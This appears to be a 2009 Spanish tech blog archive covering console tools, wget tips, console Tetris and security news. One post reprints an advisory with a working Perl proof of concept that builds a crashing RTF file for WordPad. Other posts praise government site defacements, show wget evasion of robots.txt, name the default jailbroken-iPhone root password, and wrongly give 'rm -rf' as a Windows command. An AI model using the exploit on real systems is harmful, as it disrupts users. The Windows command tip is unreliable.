viernes, 20 de noviembre de 2009

MOC: Music on console

Continuando con la idea de que a través de la consola podemos realizar todas las tareas diarias y mucho más, les presentamos a MOC, un reproductor de audio muy sencillo de utilizar y ligero, ideal para equipos con pocos recursos.

MOC - Musica en la consola

MOC o música en la consola, es un reproductor de audio de consola para sistemas Linux/Unix. Este reproductor, del que nos enteramos en esDebian.org, tiene una interfaz muy similar al Midnight Commander, el administrador de archivos y puede ser muy útil, si es que tenemos una máquina con bajos recursos, o porque tan solo nos gusta ejecutar aplicaciones en consola.

Su uso es muy sencillo, no es necesario crear listas de reproducción ya que reproduce todos los archivos contenidos en un directorio a partir del archivo seleccionado. Además, es posible reproducir varios directorios de archivos y guardar las listas de reproducción con extensión .m3u.

MOC soporta varios formatos: mp3, ogg vorbis, Flac, Musepack, Speex, Wave, Aiff y AU. Y lo más interesante, soporta streaming. Es decir, que con MOC podemos escuchar radios online.

Otro de los puntos mas interesantes de MOC, es que funciona como un demonio. Esto quiere decir que se ejecuta en segundo plano, por lo que no necesita de un entorno gráfico para funcionar. Entonces, si estas usando un emulador de terminal y necesitas abandonar el entorno gráfico, no es necesario detener la reproducción, ya que MOC seguira activo en segundo plano.

En la web oficial de MOC, podemos ver que hay paquetes disponibles para Debian y derivados. También para Fedora, FreeBSD, KateOS, Pardus, NetBSD y los respectivos sources SVN y .tar.bz2.

Para instalar MOC en Debian y derivados, debemos tipear lo siguiente en consola, previo logueo como root:

# aptitude install moc

Una vez instalado, para ejecutarlo tipeamos lo siguiente:

# mocp

El binario de MOC lleva por nombre mocp para evitar problemas con otras aplicaciones del sistema.

Las opciones principales o atajos de teclado de MOC son:

c – Limpia la lista de reproducción.

p -Comienza a reproducir desde el primer elemento en la lista de reproducción.

f – Cambia al siguiente elemento en la lista de reproducción.

r -Cambia al elemento anterior en la lista de reproducción.

s -Detiene la reproducción.

P -Pausa la reproducción.

q -Oculta la interfaz

Q -Cierra la aplicación por completo

a -Agrega un archivo/directorio a la lista de reproducción

A -Agrega un directorio recursivamente a la lista de reproducción

< -Decrementa el volumen en 1%

> -Incrementa el volumen en 1%

Los accesos rápidos del teclado pueden verse presionando “h“. Pero si se quiere acceder a mas informacion al respecto, se puede leer el manual de MOC tipeando en consola:

# man moc

Cabe destacar que MOC no es el único reproductor de audio para consola. Podemos nombrar tambien a Music Player Daemon y Mp3Blaster.

A disfrutar del poder de la muúsica mientras trabajamos en consola :)

Billy Mays Caps Lock

Posted: 18 Nov 2009 01:31 PM PST

billycapsscreenshotSin dudas una de las teclas que hay que erradicar de los teclados, sobre todo para los HOYGAN y los floggers, es la Caps Lock, realmente no sirve para nada, sólo para molestar y romper los ojos. Pero ahora, con esta aplicación, van a encontrarle una funcionalidad excelente a esta tecla, con Billy Mays Caps Lock.

¿Se acuerdan de Billy Mays? Ese vendedor de productos de TV (todavía me acuerdo esa pose con las manitos :P) estadounidense que causó furor. Bueno, es algo parecido a lo que pasa con Chuck Norris, pero menos violento (?). Con esta aplicación, cada vez que presionemos la tecla Caps Lock se van a oir las míticas frases que hicieron conocido a Billy Mays.

  • “Hi, Billy Mays here”
  • “It’ll make your whites, whiter”
  • “Order right now and we’ll double the value”
  • “Here’s how to order”

No sé qué están esperando para descargarla e instalarla (?).

Visto en DownloadSquad


via puntogeek.com

miércoles, 18 de noviembre de 2009

Office 2010 disponible

Pues ayer se lanzo office 2010 que ahora se integra a redes sociales virtuales, ahora su gestor de email outlook ofrecera a algunas empresas como twitter o facebook que creen sus app para que se pueda abrir sus cuentas desde el gestor.
Estara disponible al mercado a mediados del 2010.
Mas informacion aqui

lunes, 16 de noviembre de 2009

Hackean paginas del gobierno en protesta a lo que es mexico ahora


Esta mañana se dieron a conocer paginas hackeadas en protesta a el mexico en el que vivimos.
Despues de unas horas se dejaron venir la noticias sobre lo sucedido alguna de ellas vanguardia.com.mx sigue el link para ver lo que dijeron.
Me parece genial que ya alguien haga algo en este pais lleno de corrupcion.
Todo lo que decia en el deface lo pueden encontrar en este link

Inaguracion de Tim Berners en campus pàrty

Pues despues de que no fui al #cpartymx solo me quedo estarlos siguiendo desde casa y pues para los que no vieron la inaguracion del poderoso tim berners en #cpartymx



martes, 10 de noviembre de 2009

Falla en Wordpad-denegacion de servicios

El investigador MurderKey de Hellcode Research ha descubierto un fallo en el Microsoft Wordpad (en Windows XP SP3), que puede permitir a un atacante provocar la denegación de servicio debido a un error de agotamiento de memoria, que se origina cuando un usuario intenta ver un archivo RTF especialmente modificado.

3821737597 60d8196ee7 o Denegacion de Servicio desde el WordPad

Un atacante puede explotar la vulnerabilidad mediante la creación de un archivo RTF que asigne grandes cantidades de la memoria y provocar una condición de denegación de servicio, ya se ha hecho publico un exploit que permite aprovechar esta vulnerabilidad por lo que es recomendable que no recibamos archivos en formato RTF

Solución:
Por el momento no hay parche disponible. Por ahora se recomienda no abrir archivos de este tipo (RTF) que sean sospechosos.


Aqui esta lo que fue publicado








Affected Software:
Microsoft Wordpad on Windows XP SP3

Description of Vulnerability:
Microsoft Wordpad (on Windows XP SP3) contains a vulnerability that can allow an attacker to cause a denial of service.
The vulnerability is due to a memory exhaustion error when a user tries to view a malicious .RTF file.
An attacker can exploit the vulnerability by creating a malicious RTF file that will allocate large amounts of
memory and cause a denial of service condition.

Vulnerable version:
Windows XP SP3

Platform:
Windows XP SP3

Solution:
There is not a patch. Do not open untrusted files.

Credits:
Discovered by murderkey, Hellcode Research.
http://tcc.hellcode.net

Exploit:

#!/usr/bin/perl
#Microsoft Wordpad on WinXP SP3 Memory Exhaustion Vulnerability - 0day
#Works on WinXP SP3!
#bug found by murderkey in Hellcode Labs.
#exploit coded by karak0rsan aka musashi from Hellcode Labs
#Hellcode Research | TCC
#http://tcc.hellcode.net
#just a fuckin' lame 0day bug for fun!

$file = "hellcoded.rtf";
$header =
"\x7b\x5c\x72\x74\x66\x31\x5c\x61\x6e\x73\x69\x5c\x61\x6e\x73\x69\x63\x70\x67\x31\x32".
"\x35\x34\x5c\x64\x65\x66\x66\x30\x5c\x64\x65\x66\x6c\x61\x6e\x67\x31\x30\x35\x35\x7b".
"\x5c\x66\x6f\x6e\x74\x74\x62\x6c\x7b\x5c\x66\x30\x5c\x66\x73\x77\x69\x73\x73\x5c\x66".
"\x63\x68\x61\x72\x73\x65\x74\x31\x36\x32\x7b\x5c\x2a\x5c\x66\x6e\x61\x6d\x65\x20\x41".
"\x72\x69\x61\x6c\x3b\x7d\x41\x72\x69\x61\x6c\x20\x54\x55\x52\x3b\x7d\x7d\x0a\x7b\x5c".
"\x2a\x5c\x67\x65\x6e\x65\x72\x61\x74\x6f\x72\x20\x4d\x73\x66\x74\x65\x64\x69\x74\x20".
"\x35\x2e\x34\x31\x2e\x31\x35\x2e\x31\x35\x31\x35\x3b\x7d\x5c\x76\x69\x65\x77\x6b\x69".
"\x6e\x64\x34\x5c\x75\x63\x31\x5c\x70\x61\x72\x64\x5c\x66\x30\x5c\x66\x73\x32\x30";

$subheader = "\x5c\x41\x41\x41\x41\x41\x5c\x41\x41\x41\x41\x5c\x70\x61\x72\x0a\x7d\x0a\x00";
$ekheader = "\x5c\x70\x61\x72\x0a";
$buffer = "A" x 578001;
$buffer2 = "A" x 289000;
$buffer3 = "A" x 18186;
$buffer4 = "A" x 863973;
$buffer5= "A" x 578000;
$memory = $header.$buffer.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer4.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$ekheader.$buffer5.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer3.$subheader;
open(file, '>' . $file);
print file $memory;
close(file);
print "File PoC exploit has created!\n";






exit();



(via www.dragonjar.org)

lunes, 9 de noviembre de 2009

Bajar las picks de tus amigos de hi5 en el tamaño y calidad real

Hola pues creo que han notado que al quererse piratear una pick de algun@ amig@ al momento de guardarla les baja otra llamada "1x1_trans.gif" esto se debe a que estan protegidas contra download las imgs, y pues una forma de pirateartelas eran simplemente imprimiendo la pantalla, pero ahora me encuentro con que mozilla nos deja bajar la pagina completa que estamos viendo en alguna pestaña, incluyendo todas las imgs vistas en la pag y el code de la pag, es algo asi como un cookie, nos descarga en una carpeta todo lo necesario para ver la pagina sin conexion asi como img's complementos java y css, y afuera de la carpeta el "html" index principal para ver la pagina web.
Para poder bajar una img haremos lo siguiente:

Vamos al menu de mozilla y seleccionamos Archivo>Guardar como
o solo presionamos Ctrl+S

Seleccionamos donde la queremos guardar y verificamos que en la parte de abajo diga Página, Completa

Despues de esto podemos ir al lugar donde seleccionamos que se guardara y veremos el html y una carpeta, dentro de la carpeta estan todas las imgs vistas en la pagina web con la misma calidad y tamaño.
Y es asi como podemos bajar la imagenes de hi5 sin tener que pelear con el "1x1_trans.gif" xD.
Bueno bye hasta el otro post :D

domingo, 8 de noviembre de 2009

Elimina el molesto "virus" autorun.inf de tu usb en windows

Pues los "virus" mas comunes se ejecutan atravez de un autorun.inf el cual llama a un .exe que contiene las instrucciones maliciosas, pero... como sabemos que hay un autorun en nuestra usb???
1.- pues al meter nuestra usb en la pc no muestra un icono de una carpeta en el icono de nuestra usb.
2.- Al dar click derecho en nuestro disco de la usb nos muestra en el menu desplegable la opcion "open".

Donde al dar click nosotros en "open" éste se encarga de ejecutar el .exe y asi ejecutar el virus.

Como ya sabemos que sintomas muestra nuestra usb infectada, podemos evitar que nosotros mismo ejecutemos el virus, esto lo hacemos en forma segura abriendo nuestra usb mediante msdos y eliminando el autorun y el .exe malicioso enlisto los pasos para hacerlo.

1º Vamos a inicio>ejecutar>escribimos cmd y ejecutamos.
2º Escribimos la unidad de nuestra usb ejemplo:
> E:
3º Escribimos
E:>attrib
para enlistar nuestros archivos contenidos en nuestra memoria E: alli podremos ver los archivos que tenemos en la memoria con sus respectivos atributos(permisos de ejecucion) veremos que hay un autorun.inf y quisa una carpeta o un .exe con los siguientes atributosc-s -h -r ejemplo:
E:>attrib
>
-s -h -r autorun.inf
-s -h -r virus.exe
-s -h -r virus/

Es obvio que aquellos que estan protegidos por escritura, lectura y esta oculto son los virus por lo que le quitaremos los permisos y lo eliminaremos.
Para quitarle los permisos por ejemplo al autorun del ejemplo anterior escribimos:
E:>attrib -s -h -r autorun.inf

Si no nos marca nada es que le hemos quitado los permisos esto lo podremos verificar escribiendo de nuevo:
E:>attrib
y veremos que en la lista de archivos el autorun ya no aparece con -s -h -r antecediendole.
ahora procedemos a eliminarlo con el comando:
E:>del autorun.inf
y como ya no esta protegido se eliminara.
En caso de que sea una carpeta con el contedo malicioso eliminamos la carpeta con el siguiente comando:
E:>rm -rf nombreDirectorio

Por ultimo si somos curiosos y queremos ver a donde nos redirecciona el autorun o solo verificar que es un autorun que nos manda a ejecutar un virus y no un componente de nuestra usb, podemos ver el code del autorun tan solo escribiendo esto:
E:>edit autorun.inf

Bueno me despido espero les sirva este peque tuto y cualquier duda comentenla y les respondo aqui mismo bye bye.

jueves, 5 de noviembre de 2009

Uso de wget en GNU/LINUX (via puntogeek.com)

Wget es una herramienta basada en software libre y disponible en entornos Unix/Linux, que permite la descarga de contenidos de la web por medio de una consola de texto.

Wget

Es considerado como uno de los comandos más potentes para realizar descargas de Internet utilizando la línea de comandos. Wget permite ciertos usos simples, como algunos más avanzados.

Pero lo interesante de este comando, es que si tenemos una descarga que no se ha completado por algún motivo, Wget automáticamente tratará de continuar la descarga desde donde había terminado anteriormente. Soporta los protocolo http, https y ftp.
Veamos que nos ofrece este comando.

El uso de Wget es sencillo. Decíamos que con el podemos realizar descargas de contenido de la web, por ejemplo un archivo alojado en un sitio web. Para realizar dicha descarga simplemente deberemos tipear lo siguiente:

wget http://www.ejemplo.com/archivo.zip

Tambien podemos indicarle a este comando que queremos realizar más de una descarga en una sola línea:

wget http://www.ejemplo.com/archivo.zip ftp://www.ejemplo.com/descargas/archivo1.zip

Otra forma también es indicarle que descargue varios archivos con una misma extensión, de la siguiente manera:

wget http://www.ejemplo.com/*.zip

O sino, podemos guardar en un archivo una lista de los archivos que queremos descargar y luego lo invocamos así:

wget -i archivo.txt

El comando lo que hará es, resolver la dirección, conectarse a la web y realizar la descarga del archivo solicitado. Un comando interesante cuando queremos realizar la descarga de un archivo pesado, como por ejemplo de alguna distro de Gnu/Linux. Y ya que hablamos de descargar distros, al ser archivos grandes, podemos limitarle al comando el ancho de banda de la descarga:

wget –limit-rate=50k ftp://ftp.distribucion.org/download/distro.iso

Hasta aquí, vimos un uso bastante sencillo del comando Wget. Pero además, uno de los usos que suele dársele a wget, es para la descarga de sitios web completos.

Por ejemplo, si tipeamos lo siguiente: wget http://www.ejemplo.com, nos descargará solo la index.html del sitio web.
Pero si a esa línea le agregamos la opción -p, de la siguiente forma: wget -p http://www.ejemplo.com, descargará todos los elementos extras necesarios, como hojas de estilo, imágenes, etc.

O también podemos agregarle la opción -r, que descargará recursivamente hasta 5 niveles del sitio. O si queremos aumentar el nivel de recursividad, con la opción -l podemos indicarle hasta un número indicado, o usar “inf” que le dará un valor de recursividad infinito.

Y si por ejemplo lo que necesitamos es estudiar un sitio estando desconectados u offline, podemos usar la opción convert-links, que convertirá todos los enlaces del sitio en locales: wget –convert-links -r http://www.ejemplo.com.

Es probable que muchos sitios web no nos dejen descargarnos todo lo hay dentro de ellos, pero podemos engañarlos haciendoles creer que somos un navegador común y corriente: wget -r -p -e robots=off -U mozilla http://www.ejemplo.com.

De todas formas, algunos administradores de sistemas les ponen límites a este tipo de descargas, pero nuevamente podemos engañarlos estableciendo ciertas pausas en la descarga de la siguiente forma: wget –random-wait -r -p -e robots=off -U mozilla http://www.ejemplo.com

Como pueden ver, Wget es un comando muy potente y con múltiples opciones de uso. Pueden incluso llamar a la ayuda de este comando que les mostrará todas las opciones de uso que tiene: wget –help. Y a descargarse toda la web!
Ciertos datos fueron obtenidos de Jamsubuntu.

Tretis en CONSOLA para GNU/LINUX

Para todos aquellos amantes a las consolas y gamers eh encontrado el juego de "tetris" con el nombre de tint el cual esta disponible para ubuntu y fedora, la forma de instalarlo es:
EN UBUNTU

Abrimos una consola y escribimos:

sudo apt-get install tint

y para ejecutarlo solo escribimos:

tint

Tint

EN FEDORA

En fedora se el clon de tetris se llama bastet y para instalarlo abrimos una terminal y escribimos:

su -c "yum install bastet"

y para ejecutarlo escribimos :

bastet

Bastet

Y ya podemos jugar nuestro tetris en una consola esto es genial xD.

Este tema lo encontre en puntogeek.com


martes, 3 de noviembre de 2009

Latin Flash Tour

El Flash Tour Latino es un evento que lleva por 2 semanas, las últimas novedades alrededor de la Plataforma Flash a seis principales ciudades a través de América Latina.

La exposición oficial llega por dos Evangelistas de Plataforma en Adobe, Lee Brimelow y Enrique Duvos. También, Grant Garrett de Influxis estará acompañando en gran parte del recorrido. Además Mike Chambers participará en el evento de la Ciudad de México. Este Tour ha sido posible por los buenos amigos de Influxis, así que por favor considerarlos la próxima vez que necesiten un hosting de Flash Media Server.

Fechas:

Santiago, Chile: Noviembre 7
Buenos Aires, Argentina: Noviembre 9
Lima, Peru: Noviembre 11
Bogota, Colombia: Noviembre 13
San Jose, Costa Rica: Noviembre 16
Mexico City, Mexico: Noviembre 18


Más información:

http://latinflashtour.com/

Hackean iphone via SSH


Bueno de hecho no a todos, jeje solo a aquellos que les han hecho el famoso jailbreak, como sabemos despues de "liberar" nuestro iphone podemos usar ssh, y la mayoria de la gente que ha "liberado" su iphone no le cambia la password que trae por default dicho sistema.
Pues este error fue aprovechado por un cracker neerlandés y comenzo a escanear todos los telefonos de las redes T-mobile que tuvieran el puerto ssh abierto, y a algunos usuarios holandeses de la empresa T-mobile les llego un mensaje que decia:
"Su iPhone ha sido hackeado porque es realmente inseguro. ¡Por favor visita doiop.com/iHacked y asegúralo ahora mismo! En estos momentos puedo acceder a tus archivos."
Los usuarios al ingresar a la pagina mencionada, ésta les redireccionaba a una pagina donde se le podia mandar 5 euros al cracker en donde al igual habia un mensaje que decia:
"Si no quieres pagar, por mí esta bien"
Al igual les hacia mencionaba que si él habia podido entrar a su telefono, que otras personas mas lo podian hacer.
Bueno pues solo si ustedes tienen un iphone y le han hecho el jailbreak cambien sus password que por default viene como "alpine" y pues es facil logearse como "root"

lunes, 2 de noviembre de 2009

Programa para descargar archivos flash

Aqui un programa el cual nos permite bajar archivos flash de cualquier sitio web, solo tenemos que ingresarla URL del sitio y listo, el archivo se descarga con extension .swf y ya depende de nosotros si queremos convertir con la version pro o con otro tipo de software a nuestro archivo descargado.
Este programa se llama Flash Downloader
Free Flash Downloader- Free SWF Downloader

Widgets para GNU/LINUX !!!!!!!

Me eh encontrado en la pagina de puntogeek.com una aplicacion que nos permite poner widgets en nuestro escritorio GNU/LINUX algo asi como lo eran los de windows vista, que personalmente yo considero bonito a windows vista pero solo esooo!! no mas jaja, y que mejor que tener el mejor sistema operativo(linux), y tener algunos complementos parecidos a los que hacian bonito a vista.
La aplicacion se llama Screenlets y si los widgets que trae no nos complacen podemos descargarnos mas desde la misma pagina oficial, o desde Gnome-Look.org o KDE-Look.org.

Nvidia Screenlet